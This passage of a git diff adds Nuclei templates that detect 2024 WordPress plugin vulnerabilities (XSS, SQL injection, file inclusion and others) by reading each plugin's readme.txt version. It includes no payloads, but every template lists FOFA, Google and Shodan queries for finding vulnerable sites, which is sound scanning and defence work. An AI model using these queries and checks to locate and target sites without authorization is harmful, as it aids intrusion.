new file mode 100644
index 0000000000..dc079b0ef9
--- /dev/null
+++ b/poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161
+
+info:
+ name: >
+ Icegram Collect – Easy Form, Lead Collection and Subscription plugin <= 1.3.14 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Icegram Collect – Easy Form, Lead Collection and Subscription plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the disconnect_campaignmonitor() function, along with a few others, in versions up to, and including, 1.3.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify plugin settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/821e763a-fe84-4471-99d0-515e036122c0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43273
+ metadata:
+ fofa-query: "wp-content/plugins/icegram-rainmaker/"
+ google-query: inurl:"/wp-content/plugins/icegram-rainmaker/"
+ shodan-query: 'vuln:CVE-2024-43273'
+ tags: cve,wordpress,wp-plugin,icegram-rainmaker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram-rainmaker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram-rainmaker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.14')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml b/poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml
new file mode 100644
index 0000000000..b45504476a
--- /dev/null
+++ b/poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3
+
+info:
+ name: >
+ Child Theme Creator <= 1.5.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Child Theme Creator by Orbisius plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25f358b-f9b7-4660-8dda-673023dc1967?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43276
+ metadata:
+ fofa-query: "wp-content/plugins/orbisius-child-theme-creator/"
+ google-query: inurl:"/wp-content/plugins/orbisius-child-theme-creator/"
+ shodan-query: 'vuln:CVE-2024-43276'
+ tags: cve,wordpress,wp-plugin,orbisius-child-theme-creator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/orbisius-child-theme-creator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "orbisius-child-theme-creator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml b/poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml
new file mode 100644
index 0000000000..666f6e56f7
--- /dev/null
+++ b/poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695
+
+info:
+ name: >
+ Meta Field Block <= 1.2.13 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Meta Field Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/faee30bb-ba6e-4d3e-8ca1-79fd676e68f5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43278
+ metadata:
+ fofa-query: "wp-content/plugins/display-a-meta-field-as-block/"
+ google-query: inurl:"/wp-content/plugins/display-a-meta-field-as-block/"
+ shodan-query: 'vuln:CVE-2024-43278'
+ tags: cve,wordpress,wp-plugin,display-a-meta-field-as-block,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/display-a-meta-field-as-block/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "display-a-meta-field-as-block"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.13')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml b/poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml
new file mode 100644
index 0000000000..540c9e7c41
--- /dev/null
+++ b/poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8
+
+info:
+ name: >
+ Newsletters <= 4.9.8 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Newsletters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 4.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/64de1220-52f5-46a9-b8ba-cf808d5d2e29?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43279
+ metadata:
+ fofa-query: "wp-content/plugins/newsletters-lite/"
+ google-query: inurl:"/wp-content/plugins/newsletters-lite/"
+ shodan-query: 'vuln:CVE-2024-43279'
+ tags: cve,wordpress,wp-plugin,newsletters-lite,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsletters-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.9.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml b/poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml
new file mode 100644
index 0000000000..4be58a26c1
--- /dev/null
+++ b/poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5
+
+info:
+ name: >
+ Salon booking system <= 10.8.1 - Unauthenticated Open Redirect
+ author: topscoder
+ severity: medium
+ description: >
+ The Salon Booking System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 10.8.1. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8e64950-4f01-4391-8c65-2f25ff5bcc06?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43280
+ metadata:
+ fofa-query: "wp-content/plugins/salon-booking-system/"
+ google-query: inurl:"/wp-content/plugins/salon-booking-system/"
+ shodan-query: 'vuln:CVE-2024-43280'
+ tags: cve,wordpress,wp-plugin,salon-booking-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "salon-booking-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 10.8.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml b/poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml
new file mode 100644
index 0000000000..dee8b7e53f
--- /dev/null
+++ b/poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10
+
+info:
+ name: >
+ Void Elementor Post Grid Addon for Elementor Page builder <= 2.3 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Void Elementor Post Grid Addon for Elementor Page builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3 via the 'display_type' attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/15178478-5208-4869-a9f0-07e8e11ef0d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-43281
+ metadata:
+ fofa-query: "wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/"
+ google-query: inurl:"/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/"
+ shodan-query: 'vuln:CVE-2024-43281'
+ tags: cve,wordpress,wp-plugin,void-elementor-post-grid-addon-for-elementor-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "void-elementor-post-grid-addon-for-elementor-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml b/poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml
new file mode 100644
index 0000000000..a5b08a7783
--- /dev/null
+++ b/poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16
+
+info:
+ name: >
+ Tutor LMS <= 2.7.2 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Tutor LMS plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/839b68e6-0462-4f88-ac13-ed4b69887d6b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-43282
+ metadata:
+ fofa-query: "wp-content/plugins/tutor/"
+ google-query: inurl:"/wp-content/plugins/tutor/"
+ shodan-query: 'vuln:CVE-2024-43282'
+ tags: cve,wordpress,wp-plugin,tutor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tutor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml b/poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml
new file mode 100644
index 0000000000..065f1da8d4
--- /dev/null
+++ b/poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43283-48bd98c02d59c632156d003781e3c65c
+
+info:
+ name: >
+ Contest Gallery <= 23.1.2 - Unauthenticated Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 23.1.2. This makes it possible for unauthenticated attackers to extract data like comment user IDs and IP Addresses.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5e400f8-35b4-4be4-bb00-c59e14ddd57f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43283
+ metadata:
+ fofa-query: "wp-content/plugins/contest-gallery/"
+ google-query: inurl:"/wp-content/plugins/contest-gallery/"
+ shodan-query: 'vuln:CVE-2024-43283'
+ tags: cve,wordpress,wp-plugin,contest-gallery,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/contest-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "contest-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 23.1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml b/poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml
new file mode 100644
index 0000000000..3c623c2ac8
--- /dev/null
+++ b/poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43284-8f3b74619f71500671f7b82070889832
+
+info:
+ name: >
+ WP Travel Gutenberg Blocks <= 3.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Travel Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/55fd9ca6-fe57-490d-bfde-492957035311?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43284
+ metadata:
+ fofa-query: "wp-content/plugins/wp-travel-blocks/"
+ google-query: inurl:"/wp-content/plugins/wp-travel-blocks/"
+ shodan-query: 'vuln:CVE-2024-43284'
+ tags: cve,wordpress,wp-plugin,wp-travel-blocks,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-travel-blocks/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-travel-blocks"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.5.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml b/poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml
new file mode 100644
index 0000000000..7774d0c164
--- /dev/null
+++ b/poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43288-65d9db817865efa08483ff84c1215bb9
+
+info:
+ name: >
+ wpForo Forum <= 2.3.4 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+ The wpForo Forum plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.3.4 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cac5c66-d366-4a67-b29b-4efed67ab55b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43288
+ metadata:
+ fofa-query: "wp-content/plugins/wpforo/"
+ google-query: inurl:"/wp-content/plugins/wpforo/"
+ shodan-query: 'vuln:CVE-2024-43288'
+ tags: cve,wordpress,wp-plugin,wpforo,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpforo"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml b/poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml
new file mode 100644
index 0000000000..590e6d9248
--- /dev/null
+++ b/poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2
+
+info:
+ name: >
+ wpForo Forum <= 2.3.4 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The wpForo Forum plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.4. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/99650c4d-d8ef-4970-af65-b22b7fdf3543?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43289
+ metadata:
+ fofa-query: "wp-content/plugins/wpforo/"
+ google-query: inurl:"/wp-content/plugins/wpforo/"
+ shodan-query: 'vuln:CVE-2024-43289'
+ tags: cve,wordpress,wp-plugin,wpforo,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpforo"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml b/poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml
new file mode 100644
index 0000000000..49408ebd91
--- /dev/null
+++ b/poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296
+
+info:
+ name: >
+ Envo's Elementor Templates & Widgets for WooCommerce <= 1.4.16 - Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7abb5103-7063-4a8d-8ca0-66074954acd5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43292
+ metadata:
+ fofa-query: "wp-content/plugins/envo-elementor-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/envo-elementor-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-43292'
+ tags: cve,wordpress,wp-plugin,envo-elementor-for-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/envo-elementor-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "envo-elementor-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.16')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml b/poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml
new file mode 100644
index 0000000000..d0090514dc
--- /dev/null
+++ b/poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af
+
+info:
+ name: >
+ Flash & HTML5 Video <= 2.5.30 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Flash & HTML5 Video plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in versions up to, and including, 2.5.30. This makes it possible for authenticated attackers, with subscriber-level access and above, to update views, create thumbnails, and more.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/84ce21b9-91ac-4990-8665-69a1461147ab?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43296
+ metadata:
+ fofa-query: "wp-content/plugins/html5-video-player/"
+ google-query: inurl:"/wp-content/plugins/html5-video-player/"
+ shodan-query: 'vuln:CVE-2024-43296'
+ tags: cve,wordpress,wp-plugin,html5-video-player,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "html5-video-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.30')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml b/poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml
new file mode 100644
index 0000000000..e8ac550e1c
--- /dev/null
+++ b/poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01
+
+info:
+ name: >
+ White Label CMS <= 2.7.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The White Label CMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8069e16d-a68a-4c72-934f-f79e50777565?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43303
+ metadata:
+ fofa-query: "wp-content/plugins/white-label-cms/"
+ google-query: inurl:"/wp-content/plugins/white-label-cms/"
+ shodan-query: 'vuln:CVE-2024-43303'
+ tags: cve,wordpress,wp-plugin,white-label-cms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/white-label-cms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "white-label-cms"
+ part: body
+
+ - type: dsl
+ dsl:
